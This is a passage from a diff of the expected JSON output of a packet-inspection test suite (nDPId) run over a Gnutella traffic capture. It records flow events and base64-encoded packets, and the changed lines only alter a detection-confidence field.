EdUS0cAAGqU5DC0wpx7Tt\/+AtuQJkODlGIrBC\/cuoxr+UdUS0cAAGSQPhJYYczqO9fA1uqwCWebPjcpBMEgftbozEdUS0cAAGfwY9tAxh1AXF0ZU2EOIfqDQ08tBHbwRccYzEdUS0cAAGcZJHUoqfb+iSo9+1Aaw4nAX4zABFAH\/MAa6EdUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAAB
nDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzukdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mjw=="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2815,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":2,"flow_last_seen":174342,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174342,"pkt":"UlQAEjUCCAAn5uVZCABFAAByeiEAAIARB1EKAAIPUc1bLXAJlZkAXranfCExAmltWPgHip8OOUDUwEQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174342,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174342,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":174342,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174342,"pkt":"UlQAEjUCCAAn5uVZCABFAAByzKsAAIARKPUKAAIPlRyjr3AJwyQAXo4hNNYxAkNtQBP87WWbzy94OkQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174342,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174342,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174342,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174342,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174343,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":174343,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174343,"pkt":"UlQAEjUCCAAn5uVZCABFAAByuwkAAIARD7sKAAIPL5M0FXAJj3gAXq06x7YxAq8Sv7XsAP61JE4GfUQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174343,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174343,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2827,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":2,"flow_last_seen":174648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":174648,"pkt":"CAAn5uVZUlQAEjUCCABFAALzB\/MAAEARKy2VHKOvCgACD8MkcAkC37mfNNYxAkNtQBP87WWbzy94OkQAAMACAAAGR1RLRwAAQTW8kBkL86J3th0pUYoQZu1JqkUElRyjr8MkAQAAAAThq6+iFEdUS0cAAFxg+taEWAYB1unX7flSWQRG3beNBGic4kjQCkdUS0cAAFuWTCQAv7KdBMgSGC6mmSLY5\/ECBMKjtH4qSVdTSFIAAFpCOi4aZIiG9lYEyciBumqkMMTzBMY62gy7KEdUS0cAAFf2jq05FgyfJOGIcRJLg6NdtQ1eBLw9NLcuTEdUS0cAAFYaYH8fxSMCFJGx6KJ1XnlYMcAbBL7A0rYaYkdUS0cAAFFI2BA3K8AVe0IqJAEnw9\/D630lBI6EpQ13ZkdUS0cAAFITSOd3gRniYdJwpHJZH2SZ8zLzBFaBxFQmu1dTSFIAAEwNRRSjJbzqx43c9rTKLbxkbHgKBF4IN57HxEdUS0cAAElxJg9dajjzW3txW7a4q7j8IGI0BFHNWy2VmVdTSFIAAEJDtkelhifx87ftq707Fzo\/U0PdBC+TNBWPeEdUS0cAAGqU5DC0wpx7Tt\/+AtuQJkODlGIrBC\/cuoxr+UdUS0cAAGSQPhJYYczqO9fA1uqwCWebPjcpBMEgftbozEdUS0cAAGfwY9tAxh1AXF0ZU2EOIfqDQ08tBHbwRccYzEdUS0cAAGcZJHUoqfb+iSo9+1Aaw4nAX4zABFAH\/MAa6EdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzukdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAAB
iF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZsldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAABZMZh8YJqCRZ8rsFWpJujOrF1VMBFHNWy2cyQ=="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3065,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":191700,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191700,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00HEAAIARI3sKAAIPfCy+kXAJJ7oAIMCGR05EED8oAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3066,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":191700,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191700,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0uoEAAIARu5gKAAIPXFhcOHAJUhEAIBhcR05EED8pAQFUC1FLUlAGUk5BXS\/iNQlw"} 
@@ -1379,25 +1379,25 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3084,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":191703,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191703,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lsMAAIARXJwKAAIPVvTkVnAJJ5MAIMANR05EED87AQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3085,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":191704,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VboAAIARb2MKAAIPpanD43AJGMoAIKCTR05EED88AQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3086,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":191704,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0dUAAAIARISYKAAIPsKPnoHAJGMoAIHHbR05EED89AQFUC1FLUlAGUk5BXS\/iNQlw"} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63000,"flow_last_seen":63524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":64032,"flow_last_seen":64562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":70230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":756,"flow_tot_l4_payload_len":1058,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69141,"flow_last_seen":69581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1141,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":68108,"flow_last_seen":68639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1147,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63000,"flow_last_seen":63524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":64032,"flow_last_seen":64562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":70230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":756,"flow_tot_l4_payload_len":1058,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69141,"flow_last_seen":69581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1141,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":68108,"flow_last_seen":68639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1147,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63001,"flow_last_seen":63616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63001,"flow_last_seen":63616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":64031,"flow_last_seen":64521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1140,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":64031,"flow_last_seen":64521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1140,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 